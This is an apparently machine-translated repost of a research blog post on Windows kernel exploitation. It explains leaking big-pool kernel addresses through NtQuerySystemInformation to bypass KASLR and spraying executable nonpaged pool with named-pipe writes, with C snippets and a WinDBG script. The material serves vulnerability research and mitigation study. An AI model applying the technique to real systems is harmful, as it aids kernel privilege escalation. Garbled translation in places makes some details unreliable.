Goat's Kernel Heap feng shui: heap spray technology in "Big Kids 'pool"
0x01 technical status of Kernel Vulnerability Exploitation
The exploitation of typical kernel vulnerabilities of the "arbitrary address writing arbitrary data" type usually relies on two methods. One is to modify the data structure of some kernel spaces, this method is easy to implement locally because of the random address space allocation (KASLR) mechanism of the Windows Kernel. Another method is to redirect the program to a controllable user-state address space, and execute controllable code with ring0 permissions.
The second method mentioned above is easier to implement, because it does not need to consider changes to kernel space data and can complete full command control in a process, common technologies include modifying tagWND or HAL Dispatch Table.
However, due to the existence of the management mode Execution Protection Technology (SMEP) (also known as Intel operating system protection), this technology is no longer reliable and a direct user address space is no longer available. Therefore, other reliable alternative technologies are essential.
One possible alternative technique is to force the protection of SMEP to fail (change the bit in the CR4 register) through the drop-down programming. This method must ensure that the stack is controllable. This method was previously proposed in some papers and speeches.
Another possible alternative is to disable SMEP within the space unit of the Memory Page. This method is achieved through the page-level conversion ing entry (translation mapping entries) and mark the page of the user State as the page of the kernel state. This technology has been discussed in at least one speech, and if used, one of my friends will talk about it in the SyScan speech in 2015. In addition, if it is adopted, another different version of the technology will also be mentioned in INFILTRATE in 2015, which will be the next of these different technologies.
Finally, an alternative method should be feasible in theory. This method redirects (through a pointer or callback function table) to an existing function execution (which invalidates SMEP and bypasses KASLR ), at the same time, there is another way for attackers to gain control of the Program (not through the ROP). Of course no one has found such an existing function so far. This method should be a jump-Oriented Programming Method (JOP ).
Although there are so many technical methods above, they still use the user address space to carry the main attack load (of course this is not a problem ). So, should we still consider the possibility of using the kernel address space for attacks? Using the kernel address space to carry attack loads naturally eliminates the need to consider the issue of SMEP failure by dropping the ROP or damaging the PTE (page table entry point.
Obviously, this technology requires that a function that can execute attack loads already exists in the kernel space, or we have a way to bring it into the kernel. For example, in the case of stack/pool overflow, this attack method requires that the load should be properly configured when the attack occurs, and it also has the usual means to obtain code execution capabilities. This type of attack is especially common in "remote-remote" attacks.
What about the "arbitrary data write at any address" vulnerability that is the favorite of local attackers (Remote-local? If we have the ability to execute code in user mode to execute "write arbitrary data at any address", it is obvious that, we can constantly use "any address to write arbitrary data" to repeatedly fill in attack load data in the selected address space, but this will also bring about the following problems:
"Writing arbitrary data from any address" may be unreliable or corrupt the adjacent data, which makes it difficult to fill the code in the memory. It may be difficult to determine where to write code because of the problem of KASLR and the lack of Kernel NX. On Windows, although this problem is not so difficult to solve, it is still a technical obstacle.
This blog will introduce two new technologies (at least I think it is new), one is to name it a universal kernel space heap Injection Technology (will generate executable kernel address space ), the other is the universal kernel space heap address discovery technology to bypass KASLR.
0x02 "large pool"
Experts who are proficient in Windows heap Management (called the "pool") must understand that there are two different heap allocation mechanisms (if you are especially serious, you can also think of them as three ): one is "normal" pool allocation (including the lookaside linked list allocation method, which is slightly different from normal pool allocation), and the other is "large pool" allocation.
For allocation of less than one memory page size, "normal" pool allocation is usually used, that is, or less than 4080 bytes in X86 (8 bytes are used as the pool header, and 8 bytes are allocated to the initial idle block ), or less than 4064 bytes in X64 (16 bytes are used for the pool header, and 16 bytes are allocated to the initial idle block) will be allocated using the "normal" pool. In this allocation mechanism, address tracking, memory ing, Address Allocation count, and other operations are completed by the normal memory processor of the pool manager, and all the information is linked together by the pool header.
As for the "large pool" allocation mechanism, it is used when the allocated memory space is more than one page. It is also used to require the pool memory allocation (regardless of the allocation size) of the Cache alignment ), because the cache alignment will occupy at least one whole page.
Because there is no reserved header space, the memory pages in these "large pools" use the "large pool index table" (nt! PoolBigPageTable) to index the trail, and the pool ID used to confirm the pool Space Owner is also not saved in the header (because there is no header at all), it is also saved in PoolBigPageTable. Each entry point in the table is represented by a POOL_TRACKER_BIG_PAGES structure. The following is a record in the public symbol table:
lkd> dt nt!_POOL_TRACKER_BIG_PAGES +0x000 Va : Ptr32 Void +0x004 Key : Uint4B +0x008 PoolType : Uint4B +0x00c NumberOfBytes : Uint4B
Note that in the above table, the virtual address (Va) is actually the virtual address and the value indicating whether it is idle, in fact, the above table and the following Va can actually represent two real virtual addresses. These two addresses can only be in two States: one is idle or both are idle, it is impossible for two instances to be idle. The following WinDBG script can print out all the memory block Information allocated by the current "large pool.
r? @$t0 = (nt!_POOL_TRACKER_BIG_PAGES*)@@(poi(nt!PoolBigPageTable))r? @$t1 = *(int*)@@(nt!PoolBigPageTableSize) / sizeof(nt!_POOL_TRACKER_BIG_PAGES).for (r @$t2 = 0; @$t2 < @$t1; r? @$t2 = @$t2 + 1){ r? @$t3 = @$t0[@$t2]; .if (@@(@$t3.Va != 1)) { .printf "VA: 0x%p Size: 0x%lx Tag: %c%c%c%c Freed: %d Paged: %d CacheAligned: %d\n", @@((int)@$t3.Va & ~1), @@(@$t3.NumberOfBytes), @@(@$t3.Key >> 0 & 0xFF), @@(@$t3.Key >> 8 & 0xFF), @@(@$t3.Key >> 16 & 0xFF), @@(@$t3.Key >> 24 & 0xFF), @@((int)@$t3.Va & 1), @@(@$t3.PoolType & 1), @@(@$t3.PoolType & 4) == 4 }}
Why is the allocation of "large pools" so interesting? Because it does not share pages as the "small pool" allocation does, it is not as difficult to track pages in debugging as the "small pool" allocation does (without exporting the entire pool ), the memory allocated by the "large pool" can be easily enumerated. How easy is a non-public NtQuerySystemInformation? An API function (which bypasses KASLR) has a class specifically used to export memory Information allocated to a large pool. This class not only contains the memory size, identifier, type, but also contains the kernel-state virtual address!
As mentioned earlier, the execution of this API function does not require additional permissions. However, in Windows 8.1, this API is still restricted, only low-related calls (such as Metro applications and sandbox applications) can be used.
The following code is used to enumerate all the memory block Information allocated by the "large pool:
//// Note: This is poor programming (hardcoding 4MB).// The correct way would be to issue the system call// twice, and use the resultLength of the first call// to dynamically size the buffer to the correct size//bigPoolInfo = RtlAllocateHeap(RtlGetProcessHeap(), 0, 4 * 1024 * 1024);if (bigPoolInfo == NULL) goto Cleanup; res = NtQuerySystemInformation(SystemBigPoolInformation, bigPoolInfo, 4 * 1024 * 1024, &resultLength);if (!NT_SUCCESS(res)) goto Cleanup; printf("TYPE ADDRESS\tBYTES\tTAG\n");for (i = 0; i < bigPoolInfo->Count; i++){ printf("%s0x%p\t0x%lx\t%c%c%c%c\n", bigPoolInfo->AllocatedInfo[i].NonPaged == 1 ? "Nonpaged " : "Paged ", bigPoolInfo->AllocatedInfo[i].VirtualAddress, bigPoolInfo->AllocatedInfo[i].SizeInBytes, bigPoolInfo->AllocatedInfo[i].Tag[0], bigPoolInfo->AllocatedInfo[i].Tag[1], bigPoolInfo->AllocatedInfo[i].Tag[2], bigPoolInfo->AllocatedInfo[i].Tag[3]);} Cleanup:if (bigPoolInfo != NULL){ RtlFreeHeap(RtlGetProcessHeap(), 0, bigPoolInfo);}
0x03 pool control
Obviously, it is very useful to read these kernel-state memory addresses, but it is not enough to read only the memory block addresses. How can we further control the data in the memory block? You will notice that there are several techniques mentioned above that allow attackers in user mode to allocate kernel objects (for example, APC reserve objects ), these kernel objects have several user-controllable domains, and there is an API function used to obtain the kernel-state memory address. We basically want to do the same thing here, but not only control the several domains of the kernel object, but our goal is to find a user API that can fully control all the data of the kernel object, A "large pool" allocation can be triggered when the API is called.
This search is not as difficult as it sounds. At any time, when the space allocated by a kernel-state element exceeds the size limit described in 0X01 (greater than a memory page, that is, about 4 K, the "large pool" allocation will be triggered. Therefore, the difficulty of this problem is reduced to find a user-state API that can cause kernel-state space allocation to exceed 4 K, and the allocated data must be controllable. Because Windows XP SP2 and later versions of the operating system are forced to run the kernel space, so this space allocation must be able to generate executable memory to meet our requirements.
(In other words, this search must meet three conditions: trigger the "large pool" allocation, controllable data, and executable allocated space)
How can we meet such conditions ...... Er, two simple methods will immediately appear in your mind:
Create a local Socket and listen, connect to the Socket with another thread, and then send a write operation (the write data must exceed 4 kb), but do not read it. This will cause the WinSock Auxiliary Function Driver (AFD. SYS) to allocate memory addresses for Socket data in kernel mode. This driver is also known as another "Food stop" driver. Because all Windows network stack functions are at the DISPATCH_LEVEL (IRQL 2) layer and cannot be paged, AFD triggers a non-Paging memory block allocation, which is especially useful for us! In addition to Windows 8 and later versions, non-Paging memory is executable on other Windows platforms! Create a named pipeline and then send out a write operation (the same data is greater than 4 kb) without reading. This will also cause the named MPs queue File System (NPFS. SYS) to allocate a non-Paging memory block for MPs queue data. (The same reason is that the NPFS buffer operation is at DISPATCH_LEVEL ).
In general, the second method is simpler, with only a few lines of code required, and the pipeline operation is more concealed than the Socket operation. It should be noted that NPFS will add a prefix containing its own inline header before our own buffer, which is called DATA_ENTRY. The size of the NPFS header varies slightly with the version (XP-, 2003, and Windows 8 + vary ).
I have found the most effort-saving method to handle the offset. You can arrange the corresponding offset in the user-state buffer, eliminating the need to consider the final kernel-State Load header offset. Remember, the key of the technology mentioned here is to allocate a memory larger than one page to trigger the "large pool" allocation.
The following small program has fully considered all the above problems and requirements, which can produce our expected results after implementation.
UCHAR payLoad[PAGE_SIZE - 0x1C + 44]; //// Fill the first page with 0x41414141, and the next page// with INT3's (simulating our payload). On x86 Windows 7// the size of a DATA_ENTRY is 28 bytes (0x1C).//RtlFillMemory(payLoad, PAGE_SIZE - 0x1C, 0x41);RtlFillMemory(payLoad + PAGE_SIZE - 0x1C, 44, 0xCC); //// Write the data into the kernel//res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payLoad));if (res == FALSE) goto Cleanup;res = WriteFile(writePipe, payLoad, sizeof(payLoad), &resultLength, NULL);if (res == FALSE) goto Cleanup; //// extra code goes here...// Cleanup:CloseHandle(writePipe);CloseHandle(readPipe);
What we know is that the pool ID of the NPFS read data buffer is "NpFr" (you can use WinDBG! Pool and! Poolfind command ). Therefore, we can hard encode this identifier into our program segment and use this identifier to find the desired kernel-state virtual address loaded with attack loads, the Code bypassed by the old KASLR to deal with the random address allocation mechanism is no longer needed.
Remember that the "pagination vs non-pagination" logo is bitwise AND in the virtual address (different from what we mentioned earlier when the logo is idle or occupied, therefore, we can mark it out, and we also need to consider the alignment of the pool header (alignment is enforced, even for the "large pool" allocation ). The following shows the program segment where NpFr identifies the memory block address, applicable to Windows on the X86 Platform:
//// Based on pooltag.txt, we're looking for the following:// NpFr - npfs.sys - DATA_ENTRY records (r/w buffers)//for (entry = bigPoolInfo->AllocatedInfo; entry < (PSYSTEM_BIGPOOL_ENTRY)bigPoolInfo + bigPoolInfo->Count; entry++){ if ((entry->NonPaged == 1) && (entry->TagUlong == 'rFpN') && (entry->SizeInBytes == ALIGN_UP(PAGE_SIZE + 44, ULONGLONG))) { printf("Kernel payload @ 0x%p\n", (ULONG_PTR)entry->VirtualAddress & ~1 + PAGE_SIZE); break; }}
Is the proof in WinDBG.
Look! Package the program into a simple "kmalloc" Help function, and then you can allocate executable kernel-state memory space with known addresses. How large can this allocation be? According to my experiments, Mb is no problem at all, but because of this allocation of non-Paging memory, you must also consider whether your RAM memory is large enough. The link points to an example code (no link) where the assignment function is deployed ).
Another advantage of using this technology is that you can not only get the virtual address of the allocated space, but also get the real address of the space! As one of the Superfetch series API functions that I first discovered and applied in my "meminfo tool ), after the call, the memory manager will directly return the pool ID, virtual address, and physical address of the allocated memory.
It is RAMMap, which shows the virtual address and real address of another allocated load (note that there is a 0x1000 difference because the command line PoC code generates a page offset for the pointer, as written in the Code: Add a PAGE_SIZE ).
0x04 conclusion
This complete explosion of the technology, there are some additional instructions that will make it less sexy in 2015-This is why I did not choose to find it for the first time eight years ago, instead, I chose the reason why I broke it today:
From Windows 8, non-Paging memory is no longer allowed. The method in this article can still be used to allocate memory, but code execution will need to bypass the memory-free execution page protection (NX) mechanism. Therefore, the method proposed in this article only converts the SMEP bypass problem to the kernel-mode NX bypass problem.
In Windows 8.1, the API for obtaining the entry point and address of a large pool is only valid for low-related calls. This greatly reduces the availability of local-remote attacks, because low-correlation calls are generally loaded through sandbox applications (such as Flash, IE, Chrome, etc.) or Metro containers.
Of course, there are also some corresponding methods to solve the above problems, such as sandbox escape is often used in local-remote attacks, so the above problem 2) there is room to solve. As for the above problem 1), some smart researchers have also pointed out that NX is not fully deployed in all places, such as the allocated Session pool space, the new version of Windows is still executable, of course, only X86 (32-bit) systems can be executed. How can I implement this technology in the extended Windows version as an exercise for the reader (Note: There is a Pool called "Big Session Pool" in the system ).
So what should I do in a 64-bit Windows or an updated version of Windows 10? It seems that the technology mentioned in this article is invalid on these systems --- |-Is that true !? In kernel mode, has all the memory space been NX? Or is there any other method to allocate to the executable memory space and get its address? When November 14 and Windows 14 are released, I will answer these questions in my Blog immediately.